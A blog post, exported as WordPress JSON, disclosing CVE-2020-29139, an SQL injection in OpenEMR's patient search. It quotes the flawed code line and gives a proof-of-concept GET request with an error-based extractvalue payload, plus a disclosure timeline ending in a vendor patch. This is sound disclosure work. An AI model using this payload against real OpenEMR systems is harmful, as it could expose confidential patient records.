{"id":70,"date":"2021-02-15T01:38:25","date_gmt":"2021-02-14T19:38:25","guid":{"rendered":"https:\/\/murat.one\/?p=70"},"modified":"2021-02-15T02:28:27","modified_gmt":"2021-02-14T20:28:27","slug":"cve-2020-29139-sql-injection-vulnerability-in-library-patient-inc-in-openemr-6-0-0-dev-5-0-25","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=70","title":{"rendered":"CVE-2020-29139. SQL injection vulnerability in OpenEMR 6.0.0-dev, 5.0.2(5)"},"content":{"rendered":"\n

Product:<\/strong> OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)<\/p>\n\n\n\n

Vulnerability:<\/strong> SQL injection<\/p>\n\n\n\n

Discovered:<\/strong> Kutlymurat Mambetniyazov (@manfromkz)<\/p>\n\n\n\n

Acknowledgements: <\/strong>NitroTeam.kz<\/p>\n\n\n\n

Date:<\/strong> 11\/24\/2020<\/p>\n\n\n\n

Description: <\/strong>Ineffective use of add_escape_custom() in library\/patient.inc leads to SQL injection.<\/p>\n\n\n\n

Requirements: <\/strong>the administrator account<\/p>\n\n\n\n

Tested on: <\/strong>Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev<\/p>\n\n\n\n

Vulnerable code:<\/strong> library\/patient.inc:648<\/p>\n\n\n\n

$where .= \" \" . add_escape_custom($val) . \" like ? \";<\/code><\/pre>\n\n\n\n
Steps to reproduce<\/strong>:<\/p>\n\n\n\n
Send the GET request (replace with your Host, valid csrf_token_form and OpenEMR cookie of administrator):<\/p>\n\n\n\n
GET \/interface\/main\/finder\/patient_select.php?csrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&findBy=Filter&searchFields=extractvalue(0x0a,concat(0x0a,(version()))) HTTP\/1.1\nHost: openemr60.kz\nCookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD;<\/code><\/pre>\n\n\n\n
Screenshot for 6.0.0-dev:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Screenshot for 5.0.2(5):<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\n
Timeline of the vulnerability:<\/p>\n\n\n\n
11\/24\/2020 – vulnerability discover
11\/24\/2020 – notification to vendor
11\/25\/2020 – confirmation by vendor
11\/27\/2020 – reservation of CVE ID at MITRE
01\/07\/2021 – patch release
02\/15\/2021 – published<\/p>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"
Ineffective use of add_escape_custom() in library\/patient.inc leads to SQL injection in OpenEMR 6.0.0-dev, 5.0.2(5).<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[10,14],"tags":[18,15,17,16],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/70"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=70"}],"version-history":[{"count":14,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/70\/revisions"}],"predecessor-version":[{"id":107,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/70\/revisions\/107"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=70"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=70"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=70"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}